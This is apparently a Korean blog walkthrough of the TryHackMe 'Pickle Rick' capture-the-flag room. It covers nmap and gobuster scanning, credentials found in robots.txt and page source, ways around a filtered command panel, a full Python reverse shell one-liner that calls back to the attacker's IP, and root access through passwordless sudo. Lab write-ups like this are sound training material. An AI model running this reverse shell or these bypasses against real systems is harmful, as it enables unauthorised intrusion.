본문 바로가기
TryHackMe

TryHackMe - Pickle Rick

by skyepodium 2022. 11. 27.

링크: https://tryhackme.com/room/picklerick

참고: https://www.youtube.com/watch?v=oCAtfcr3iUw 

 

1. nmap

nmap으로 포트 스캔하면 22, 80번 포트가 열려있음을 확인할 수 있습니다.

nmap -sC -sV -oN nmap/initial 10.10.246.239

 

2. gobuster

gobuster로 url 스캔을 수행하면, login.php, robots.txt를 찾을 수 있습니다.

gobuster dir -u http://$IP -w /Users/skyepodium/pwnable/wordlist/node-dirbuster/lists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,js,css,py

 

3. 페이지 탐색

robots.txt 에는 다음 문자열이 있습니다.

Wubbalubbadubdub

그리고 메인 페이지에서 소스보기를 하면 Username이 있습니다.

R1ckRul3s

login.php에서 위 2개의 문자열을 id/pw에 넣으면 로그인이 됩니다.

 

4. linux command

리눅스 명령어를 실행시킬 수 있습니다.

cat, head, tail은 필터링되어서 사용할 수 없습니다.

다음 내용에서 필터링 되지 않은것을 찾아서 사용합니다. 

# readfile
cat clue.txt
tac clue.txt
head clue.txt
tail clue.txt
while read line; do echo $line; done < clue.txt
grep . clue.txt

# read all file in directory
grep -R .

 

`grep -R .`을 사용해서 디렉토리의 모든 파일을 읽을 수 있습니다.


첫번째 재료는 mr. meeseek hair

 

5. reverse shell

사실 command panel에서 ls, cd로 디렉토리 탐색할 수도 있는데, 영상에서는 reverse shell을 사용했으니 따라해봅니다.

 

1) listening mode

맥 터미널에서 nc으로 9999 포트를 열고 기다립니다.

nc -lvn 9999

2) command panel에 명령어를 넣습니다.

vpn을 사용해서 접속했기 때문에 ip를 vpn용으로 잘 적어줍니다.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.7.18",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh", "-i"]);'

3) netcat이 응답받고 연결됩니다. 

 

6. 권한

허용된 옵션을 확인해보면, 비밀번호 없이 root가 될 수 있습니다. 

sudo -l

root가 되고 /root 디렉토리에 가보면, 3번째 재료가 있습니다.

 

sudo su

 

그리고 /home/rick 디렉토리에 가보면, 2번째 재료가있습니다.

'TryHackMe' 카테고리의 다른 글

TryHackMe - c4ptur3-th3-fl4g  (0) 2022.11.27